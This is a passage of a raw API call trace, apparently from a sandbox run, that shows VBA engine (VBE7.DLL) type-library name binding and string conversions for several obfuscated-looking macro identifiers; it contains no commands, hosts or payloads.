WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.494] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.494] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.494] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.494] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.494] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.494] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.494] IUnknown:Release (This=0x665ba50) returned 0xd [0069.494] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.494] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.494] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.494] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.494] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.494] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.495] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.495] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.495] IUnknown:Release (This=0x665ba50) returned 0xd [0069.495] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.495] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.495] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.495] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.495] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.495] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.495] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.495] IUnknown:Release (This=0x665ba50) returned 0xd [0069.495] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.495] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.495] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.495] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.495] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.495] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.495] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.495] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.495] IUnknown:Release (This=0x665ba50) returned 0xd [0069.495] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.496] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.496] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.496] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.496] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.496] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.496] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.496] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.496] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.496] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.496] IUnknown:Release (This=0x665ba50) returned 0xd [0069.496] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.496] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.496] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.496] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.496] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.496] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.496] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.496] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.496] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.496] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.497] IUnknown:Release (This=0x665ba50) returned 0xd [0069.497] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.497] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.497] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80ea6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="sAkkBB") returned 7 [0069.497] ITypeComp:RemoteBind (in: This=0x665ba60, szName="sAkkBB", lHashVal=0x10dd48, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80ea6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="sAkkBB") returned 7 [0069.497] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="sAkkBB", lHashVal=0x10dd48, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80ea6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="sAkkBB") returned 7 [0069.497] ITypeComp:RemoteBind (in: This=0x665bd30, szName="sAkkBB", lHashVal=0x10dd48, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.497] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sAkkBB") returned 0x10dd48 [0069.497] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="sAkkBB" | out: _Dst="sAkkBB") returned 0x0 [0069.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="sAkkBB") returned 7 [0069.497] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.497] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="sAkkBB", lHashVal=0x10dd48, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.497] IUnknown:Release (This=0x665ba50) returned 0xd [0069.497] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.497] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="sAkkBB", lHashVal=0x10dd48, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.497] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.497] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.498] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="sAkkBB", lHashVal=0x10dd48, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.498] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.498] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.498] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="sAkkBB", lHashVal=0x10dd48, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.498] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80ea6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="sAkkBB") returned 7 [0069.498] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="sAkkBB", lHashVal=0x10dd48, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.498] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.498] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b80ea6 | out: _Dst=0x67c2d40) returned 0x0 [0069.498] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_sAkkBB") returned 0x1057b2 [0069.498] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_sAkkBB" | out: _Dst="_B_var_sAkkBB") returned 0x0 [0069.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_sAkkBB") returned 14 [0069.498] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.498] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_sAkkBB", lHashVal=0x1057b2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.498] IUnknown:Release (This=0x665ba50) returned 0xd [0069.498] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.498] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_sAkkBB", lHashVal=0x1057b2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.498] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.498] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.498] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_sAkkBB", lHashVal=0x1057b2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.498] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.498] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.498] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_sAkkBB", lHashVal=0x1057b2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.498] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.498] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.498] IUnknown:Release (This=0x665ba50) returned 0xd [0069.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8700ae, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_sAkkBB") returned 14 [0069.499] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_sAkkBB", lHashVal=0x1057b2, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x73005f00720061, ppTypeComp=0x42006b00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x73005f00720061, ppTypeComp=0x42006b00000000, pDummy=0x0) returned 0x0 [0069.499] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b80ea6 | out: _Dst=0x144ec0) returned 0x0 [0069.499] ITypeComp:RemoteBind (in: This=0x665ba60, szName="MBBkQw", lHashVal=0x10f644, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80f9a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="MBBkQw") returned 7 [0069.499] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="MBBkQw", lHashVal=0x10f644, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80f9a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="MBBkQw") returned 7 [0069.499] ITypeComp:RemoteBind (in: This=0x665bd30, szName="MBBkQw", lHashVal=0x10f644, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.499] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MBBkQw") returned 0x10f644 [0069.499] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="MBBkQw" | out: _Dst="MBBkQw") returned 0x0 [0069.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="MBBkQw") returned 7 [0069.499] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.499] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="MBBkQw", lHashVal=0x10f644, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.499] IUnknown:Release (This=0x665ba50) returned 0xd [0069.499] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.499] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="MBBkQw", lHashVal=0x10f644, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.499] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.499] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.499] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="MBBkQw", lHashVal=0x10f644, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.500] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.500] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.500] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="MBBkQw", lHashVal=0x10f644, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.500] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80f9a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="MBBkQw") returned 7 [0069.500] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="MBBkQw", lHashVal=0x10f644, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.500] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.500] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b80f9a | out: _Dst=0x67c2d40) returned 0x0 [0069.500] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_MBBkQw") returned 0x1070ae [0069.500] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_MBBkQw" | out: _Dst="_B_var_MBBkQw") returned 0x0 [0069.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_MBBkQw") returned 14 [0069.500] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.500] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_MBBkQw", lHashVal=0x1070ae, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.500] IUnknown:Release (This=0x665ba50) returned 0xd [0069.500] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.500] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_MBBkQw", lHashVal=0x1070ae, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.500] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.500] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.500] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_MBBkQw", lHashVal=0x1070ae, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.500] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.500] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.500] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_MBBkQw", lHashVal=0x1070ae, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.500] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.500] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.500] IUnknown:Release (This=0x665ba50) returned 0xd [0069.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8700de, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_MBBkQw") returned 14 [0069.500] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_MBBkQw", lHashVal=0x1070ae, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4d005f00720061, ppTypeComp=0x51006b00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4d005f00720061, ppTypeComp=0x51006b00000000, pDummy=0x0) returned 0x0 [0069.501] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b80f9a | out: _Dst=0x144ec0) returned 0x0 [0069.501] ITypeComp:RemoteBind (in: This=0x665ba60, szName="hcBAAAC", lHashVal=0x10f9c1, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80f72, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="hcBAAAC") returned 8 [0069.501] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="hcBAAAC", lHashVal=0x10f9c1, 